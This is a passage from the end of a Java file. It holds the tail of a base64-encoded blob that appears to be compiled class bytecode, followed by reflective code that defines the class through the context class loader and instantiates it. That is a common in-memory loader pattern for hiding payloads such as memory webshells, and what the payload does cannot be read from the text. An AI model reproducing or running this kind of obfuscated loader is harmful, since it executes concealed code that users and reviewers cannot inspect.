jVm4AA62AA+3AI4ZCgMZCr62AI+2AHcZB7YAkFenAAROpwAETbEAAgAMAMQAxwATAAAAyADLABMABACfAAAAWgAWAAABXQAMAV8AEgFgAB8BYQAqAWIALwFjADoBZABHAWUAVAFmAF0BZwBmAWgAcAFpAHoBagCBAWsAhQFsAJkBbQClAW4AxAFyAMcBcQDIAXQAywFzAMwBdQCgAAAAcAALAEcAfQEfAJgABQBUAHABIACYAAYAXQBnALgBIQAHAIEAQwELAQwACACFAD8BIgCaAAkApQAfASMBDgAKACoAmgEZAJoABAASALIBJACaAAMADAC8ASUAmAACAAAAzQChAKIAAAAAAM0A7QCYAAEAuQAAAAwAAQBdAGcAuAEmAAcAqgAAABQABfwAxAcArEIHALD6AABCBwCwAAAIAScApQABAJ4AAAA7AAIAAAAAABcDswAIuwBOWbcAkbMAB7sAjVm3AJJXsQAAAAEAnwAAABIABAAAAAcABAAIAA4ADgAWAA8AAQEoAAAAAgEp");
Class clazz = (Class)method.invoke(Thread.currentThread().getContextClassLoader(), new Object[] {
arrayOfByte, Integer.valueOf(0), Integer.valueOf(arrayOfByte.length) });
clazz.newInstance();
System.out.println(clazz.getDeclaredMethods());
} catch (IOException e) {
System.out.println("Can't read eeeee");
}
}
}